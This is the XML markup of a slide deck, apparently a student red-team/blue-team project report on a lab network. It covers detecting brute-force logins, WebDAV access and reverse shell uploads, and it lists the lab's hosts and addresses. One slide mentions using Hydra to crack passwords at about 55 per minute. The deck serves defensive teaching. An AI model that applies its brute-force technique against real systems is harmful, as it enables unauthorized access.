              <a:spcAft>
                <a:spcPts val="120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Preventing Brute Force Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;290;p36"/>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91" name="Google Shape;291;p36"/>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Failed rapid credential submissions are a good indicator of a brute force attack. </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>For example, my usage of Hydra to crack the passwords as part of the Red Team activities resulted in roughly 55 passwords per minute being submitted.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>It is my opinion that any more than two failed submissions in a single second should trigger an alarm to be sent to the SOC.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p36"/>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Similar to the Hidden Directory request I would recommend a rule that temporarily locks down a user account as soon as incorrect credentials begin bombarding the login utility.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>As part of the configuration a decision can be made as to whom is contacted (SOC, IT group, involved user, etc) when the condition is encountered.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Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Google Shape;298;p37"/>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299" name="Google Shape;299;p37"/>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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Set up an alert for non-approve-listed IP’s that reach the server. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>I would recommend triggering of the alert at each log entry.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p37"/>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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Configure a firewall with a list of “Allow” IP’s and or MAC addresses for any personnel that should have access to the WebDAV directory(s). If someone is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>trying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> to login and their IP or MAC address are not already on the Allow list, block entry and direct them to the administrator to get access if warranted.</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="45833"/>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8" name="Google Shape;108;p20"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p20"/>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110" name="Google Shape;110;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20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="112" name="Google Shape;112;p2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3" name="Google Shape;113;p2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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="115" name="Google Shape;115;p2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16" name="Google Shape;116;p20"/>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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="118" name="Google Shape;118;p20"/>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 name="Google Shape;119;p20"/>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20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Google Shape;121;p20"/>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2" name="Google Shape;122;p20"/>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20"/>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24" name="Google Shape;124;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28" name="Google Shape;128;p20"/>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29" name="Google Shape;129;p20"/>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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;p38"/>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
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="160245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Create an alert that triggers any time that a .php file is sent to the network, quarantine the file in a non-web-accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> until the payload can be analyzed and proper disposition determined.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The following measures should be quite effective in preventing reverse shell uploads:</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>1. Require authentication to upload</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>2. Store uploaded files in a location not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> from the web.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>3. Don’t evaluate or include uploaded data</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>4. Scramble uploaded file names and extensions</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>5. Define valid types of files that the users should be permitted to upload.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="12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Exhibits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="314" name="Google Shape;314;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311702" y="1017725"/>
            <a:ext cx="3441576" cy="3598799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Google Shape;315;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4168600" y="1017725"/>
            <a:ext cx="4301375" cy="1718350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="316" name="Google Shape;316;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829700" y="3183150"/>
            <a:ext cx="4979174" cy="1433375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580525" y="4527275"/>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A</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797588" y="2617013"/>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B</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867338" y="4527275"/>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Exhibits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4050300" y="4694088"/>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E</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Google Shape;326;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="903600"/>
            <a:ext cx="3927999" cy="1297950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Google Shape;327;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="352775" y="2281175"/>
            <a:ext cx="8520598" cy="2484375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350350" y="1352463"/>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Exhibits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580525" y="4743300"/>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H</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015238" y="4743300"/>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I</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="336" name="Google Shape;336;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11379" l="0" r="7054" t="11886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="366025" y="887400"/>
            <a:ext cx="3898327" cy="1754100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="337" name="Google Shape;337;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="366025" y="3129250"/>
            <a:ext cx="3898325" cy="1717375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510763" y="2729038"/>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F</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="Google Shape;339;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4756950" y="3129250"/>
            <a:ext cx="4066175" cy="1717375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5945500" y="2729050"/>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G</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="341" name="Google Shape;341;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19263" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4756950" y="659850"/>
            <a:ext cx="4066176" cy="20692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Exhibits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665113" y="3590600"/>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J</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6055288" y="1861113"/>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K</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867338" y="4527275"/>
            <a:ext cx="9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Exhibit C</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Google Shape;350;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17749" l="0" r="31530" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4362400" y="1017725"/>
            <a:ext cx="4429201" cy="796325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Google Shape;351;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6261" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="3610725" cy="252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74325" y="2088475"/>
            <a:ext cx="8595300" cy="79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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p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idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6901825" y="735125"/>
            <a:ext cx="1750200" cy="4083300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="182875" lIns="182875" spcFirstLastPara="1" rIns="182875" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900"/>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Address Range: 198.162.1.8/24</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Netmask: 255.255.255.0</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Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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IPv4: 192.168.1.8</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OS: Linux</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Hostname: Kali</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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>IPv4: 192.168.1.1 :22</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>OS: Windows XP SP2</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>Hostname: Target Gateway</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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IPv4: 192.168.1.100</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OS: Linux</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Hostname: Target</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IPv4: 192.168.1.105</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OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="700">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>Hostname: Elk Server</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
